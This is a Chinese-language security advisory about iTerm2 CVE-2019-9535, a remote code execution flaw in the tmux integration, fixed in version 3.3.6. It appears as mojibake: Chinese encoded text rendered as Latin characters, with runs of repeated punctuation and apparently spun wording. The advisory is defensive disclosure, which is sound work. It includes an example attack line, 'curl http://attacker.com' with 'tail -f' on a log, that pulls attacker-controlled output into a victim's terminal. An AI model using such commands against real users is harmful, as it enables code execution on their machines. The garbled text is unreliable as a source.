iTerm2Ô¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ
Ðû²¼Ê±¼ä 2019-10-10Îó²î±àºÅºÍ¼¶±ð
CVE±àºÅ£ºCVE-2019-9535£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜÎó²îÓ°Ïì
Îó²î¸ÅÊö
iTerm2 ÊÇÈ«Çò×îÈÈÃŵÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬£¬£¬£¬£¬ÊÇ¿ª·¢Ö°Ô±¾³£Ê¹ÓÃµÄ MacOS Öն˹¤¾ß£¬£¬£¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈÈÃÅ¿ªÔ´¹¤¾ßÌæ»»Æ·Ö®Ò»£¬£¬£¬£¬£¬±»Ðí¶à¿ª·¢Ö°Ô±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£¡£¡£¡£
iTerm2¹Ù·½Ðû²¼ÁËÇå¾²¸üÐÂÐÞ¸´ÁËÒ»¸öÖÁÉÙ±£´æ7ÄêµÄÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬£¬£¬Õâ¸öÎó²îÔ´×Ô iTerm2 ÖÐµÄ tmux ¼¯ÀÖ³ÉÄÜ¡£¡£¡£¡£¡£¡£Tumx Ó¦ÓóÌÐòÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬£¬£¬£¬£¬¿ÉÔÊÐí´Óµ¥¸ö×°±¸½¨Éè²¢¿ØÖƶà¸öÖÕ¶Ë¡£¡£¡£¡£¡£¡£
¹¥»÷Õß¿ÉÒÔÔÚÓû§µÄÖն˱¬·¢Êä³ö£¬£¬£¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿°üÀ¨Í¨¹ý ssh ÅþÁ¬ÖÁ¶ñÒâЧÀÍÆ÷£¬£¬£¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬£¬£¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×Ù°üÀ¨Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£¡£¡£¡£ÔÚÐí¶àÇéÐÎÏÂÄܹ»ÔÚÓû§ÅÌËã»úÉÏÖ´ÐÐÏÂÁî¡£¡£¡£¡£¡£¡£
Îó²îÑéÖ¤
ÍâÑóµÄRadially Open SecurityÒѾ·Å³öÎó²îʹÓÃÀֳɵÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÅþÁ¬µ½¶ñÒâ SSH ЧÀÍÆ÷Ö®ºó£¬£¬£¬£¬£¬ÔÚ»úеÉÏÖ´Ðз¿ªÒ»¸öÅÌËãÆ÷ÏÂÁîµÄPoC ÊÓÆµ¡£¡£¡£¡£¡£¡£
ÐÞ¸´½¨Òé
¹Ù·½ÒÑ¾ÍÆ³öÇå¾²¸üУ¬£¬£¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£¡£¡£¡£
²Î¿¼Á´½Ó
https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/